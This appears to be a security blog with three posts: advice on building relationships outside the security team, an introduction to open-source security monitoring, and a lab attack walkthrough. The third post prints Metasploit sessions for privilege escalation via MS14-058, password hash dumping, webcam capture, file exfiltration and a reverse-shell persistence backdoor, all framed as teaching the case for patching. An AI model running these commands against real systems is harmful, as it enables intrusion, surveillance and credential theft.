The Missing CISSP Domain

In the security world, the CISSP is the gold standard certification for information security professionals.  The exam is incredibly broad covering a number of domains.  However, over the course of my career I’ve realized that there’s a key domain that’s missing.

Oh really, Eric?  And what might that domain be?

Securing relationships.

Huh?  Securing relationships?  What does that even mean, Eric?  Have you finally gone security-mad?

Ok, hear me out.  What I’m referring to specifically is, developing and cultivating relationships across teams outside of security.  For a team often viewed as curmudgeonly, elitist, and an all-around roadblock to the business, it is imperative that significant effort is made reaching out and “securing relationships.”

A major function of security is performing risk assessments so that the business can make informed decisions.  In that sense, security is serving the business and should have a service-oriented mindset.  To that end, rather than simply saying no or objecting to a request, consider an alternative approach.  Patiently educate others on the risks of a given situation, suggest a secure solution that meets or beats expectations, and always go the extra mile to ensure that any given recommendation continues to be the optimal method.  Yes, it takes more time and effort and goes against our natural I-hate-everything-especially-people M.O. but the payoff will be more than worth it.  While the business won’t always do exactly what we want, folks will be more willing to engage and listen to us if we offer reasonable solutions versus the traditional high-and-mighty-security-rage-and-hate.

This is certainly easier if you’re naturally social to begin with.  And I know, we’re 1337 haxx0rs too busy saving the world to be bothered to look up from our computers.  But it turns out, if we leave our desks once in a while to say hello or smile and to casually discuss security in a real-world context with someone who may not be as knowledgeable, we might just find that people are more interested and willing to support security than we may think.  And ultimately, this leads to more security advocates, more support for our security (and career!) goals, and yes a more secure workplace.  Plus, you might even make a friend or two. 😛

I think security professionals often operate with a superiority complex.  We wrongly assume everyone knows and defaults to the “secure choice” and that anyone who doesn’t is “an idiot.”  We rant that we’re the last to be told and first to be blamed for anything and everything (well maybe that’s kinda true… :P).  But what are we doing to help this?  What makes us think that internalizing the frustration, becoming more snarky, and fitting the classic grumpy security guy/girl stereotype solves this?

The truth is, if we want people to appreciate security and what we do, we’ve got to return the favor and recognize that what others do is equally valuable and work with them to educate and demonstrate how security can positively impact their own work.  I honestly believe that most people want to be more secure, they just don’t know how.  Typically, people don’t make the “secure choice” simply because no one’s ever illustrated the risks and outlined recommendations in a way that’s understandable to them.  Ironically, people are intimidated to ask the security personnel (you know, the team paid to secure things all day) how they can help the company be more secure and it’s often a result of stereotypes that we as security professionals do little to change.

So I urge us to recognize our core strengths and use those to develop relationships.  Personally, I use humor and my love of teaching to help make security fun and less intimidating.  In my current position, through both effort and chance, I’ve had the opportunity to meet and work with a large part of the organization.  I’ve made the most of this by making it a point to develop friendly and strong relationships with teams outside security.  It has led to these same teams reporting possible security incidents, asking for security’s opinion before moving forward, and spreading the good security word to create a security-minded culture.  It seems obvious, but as with most things, it takes significant effort.

Speaking of security-minded cultures, a great way to secure relationships is through awareness trainings.  In a future post, I’ll share my thoughts on the importance of security awareness trainings and how to deliver these in an effective manner.


OSM: Open Security Monitoring


I’ve spent most of my career defending environments of all sizes.  What I’ve found is that the job of a defender is much less flashier and thankless as compared to an “ethical hacker.”  While there are volumes of articles, guides, and talks on penetration testing and the latest attacks, there isn’t much on defending or security monitoring.  With plenty of free tools and exploits for attackers (such as the venerable Kali Linux), there doesn’t seem to be as much excitement for building similar tools for defenders.  In fact, there’s a notion that in order to properly defend a network, you must spend thousands or even millions of dollars.

Enter “Open Security Monitoring”, or “OSM”, which I refer to as a system of integrated open source security tools working together to secure networks of all sizes and all budgets.  Why open source?  There are three specific advantages:

  • Cost: Open source security tools are freely available for anyone to download and install.  This makes the barrier to entry much lower for convincing management to implement these tools.
  • Transparency: The source code can be viewed and edited by anyone, making it clear how it works.  If it doesn’t do something you want it to do, you’re free to modify the code to fit your needs.  I’ve always found the best way to learn and understand something is to take it apart and look at how all the pieces work together.  It’s no different with security tools.
  • Quality: Just because it’s open source and “free”, doesn’t mean it’s a lesser tool than something costing thousands of dollars.  In fact, many are better than anything commercially available because they’re built and supported by a passionate community that isn’t looking to simply make the next big sale.

In this series, I will walk through key OSM components and the relevant tools I’ve used to defend real-world environments:

  • Intrusion Detection/Prevention System
  • Network Security Monitoring
  • Host Intelligence
  • Security Analytics

You could certainly achieve this without using open source tools, but the point here is that you can build a robust security monitoring architecture with limited financial resources.  And if you have some money to spend, open source security tools complement commercial systems well.  Each environment is unique and you’ll likely have a mix of open source and commercial products.

What’s Next

We’ve defined the concept of Open Security Monitoring and why there is a need for open source security tools.  Next, we’ll explore the first of four OSM components, intrusion detection/prevention systems.


Seeing Red: The Fun Stuff

The Fun Stuff: Privilege Escalation, Exfiltration, and Persistence

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we successfully exploited our Victim using a client-side attack targeting an old version of Microsoft Internet Explorer.  We ended with a Meterpreter session confirming our access to the Victim machine.  In this part, we’ll explore the capabilities of Meterpreter including privilege escalation and data exfiltration.

Privilege Escalation

We talked a bit about Meterpreter in the last post, now let’s play with some of its many functions.  Our Meterpreter session is now running under the Notepad process as the lower-privileged “eric” user.  We want to escalate our privileges to give us enhanced system functionality.  In Windows, the highest user is “SYSTEM”.

Meterpreter has a built-in “getsystem” command that will attempt to use various techniques to elevate our user to SYSTEM.  Let’s give it a try.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

Hmm, no luck.  No worries, let’s try a local exploit.  MS14-058 seems like a good one.

meterpreter > background
Backgrounding session 1...
msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
msf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set LHOST
msf exploit(ms14_058_track_popup_menu) > set LPORT 5555
LPORT => 5555
msf exploit(ms14_058_track_popup_menu) > exploit
[*] Started reverse handler on
[*] Launching notepad to host the exploit...
[+] Process 1556 launched.
[*] Reflectively injecting the exploit DLL into 1556...
[*] Injecting exploit into 1556...
[*] Exploit injected. Injecting payload into 1556...
[*] Payload injected. Executing exploit...
[*] Sending stage (770048 bytes) to
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened ( -> at 2015-07-26 17:04:37 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Success!  We’re now running as SYSTEM.

A Litte Bit of Fun

So now what?  The first thing an attacker will likely do is dump password hashes.  This is easy to do with Meterpreter.  These hashes can the be cracked offline giving us, the Attacker, passwords to try on Victim online accounts.

meterpreter > hashdump

How about a screenshot of the desktop?

meterpreter > screenshot
Screenshot saved to: /root/mUSXxVRT.jpeg


Got a webcam? Let’s take a picture and stream some video!

meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/SCCMCDyI.jpeg

meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: zwuaLciW.html
[*] Streaming...

What files are on the system?  Perhaps a password file…

meterpreter > ls

Listing: c:\Users\eric\Desktop

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2015-07-26 17:13:01 -0500 .
40777/rwxrwxrwx 0 dir 2014-11-11 19:36:51 -0600 ..
100666/rw-rw-rw- 282 fil 2014-11-11 20:06:50 -0600 desktop.ini
100666/rw-rw-rw- 113 fil 2015-07-26 17:12:27 -0500 my_passwords.txt

meterpreter > cat my_passwords.txt
Top Secret Passwords
+ Bank: no-one-will-guess-this-password
+ Email: password!@#$
+ Amazon: shoptilyoudrop192

meterpreter > download my_passwords.txt
[*] downloading: my_passwords.txt -> my_passwords.txt
[*] downloaded : my_passwords.txt -> my_passwords.txt

This is but a small sampling of the many commands Meterpreter provides.  Play with the other commands to see what else Meterpreter can do.


Now that we’ve compromised our Victim machine, let’s install a persistent backdoor that allows us back in even if the machine is restarted.  To do this, we’ll generate a backdoor that autostarts and periodically calls back to our Attacker machine.

meterpreter > run persistence -S -i 5 -p 1337 -r
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-FDN9DNVQ5IR_20150726.4130/WIN-FDN9DNVQ5IR_20150726.4130.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST= LPORT=1337
[*] Persistent agent script is 148420 bytes long
[+] Persistent Script written to C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[*] Executing script C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[+] Agent executed with PID 2008
[*] Installing as service..
[*] Creating service dexYVTDwgSWcORt

Back on our Attacker machine, we’ll setup a Meterpreter handler to accept any incoming connections from our Victim machine.

msf exploit(ms14_058_track_popup_menu) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 1337
LPORT => 1337

Run the handler on the Attacker and restart the Victim machine. If all goes well we should be reconnected as SYSTEM.

msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to
[*] Meterpreter session 7 opened ( -> at 2015-07-26 17:47:55 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Too easy!


Throughout this series we’ve walked through a typical client-side attack.  We started with a basic understanding of penetration testing tools and what is commonly used.  We performed reconnaissance on our Victim machine and determined what vulnerable software could be exploited.  We then set up a client-side attack and compromised our Victim machine, gaining low-privilege access.  Finally, we executed a local privilege escalation exploit to gain SYSTEM privileges, used Meterpreter to demonstrate our control over the system including data exfiltration, and finally created a persistent backdoor so we can re-establish access at any time.

Hopefully, this has been an eye-opening experience to see just how easy it is to compromise a system and why it is so important to stay up to date with software patches and apply basic security principles.  In the next series, we’ll investigate how to detect malicious activity and defend a network using open source security tools.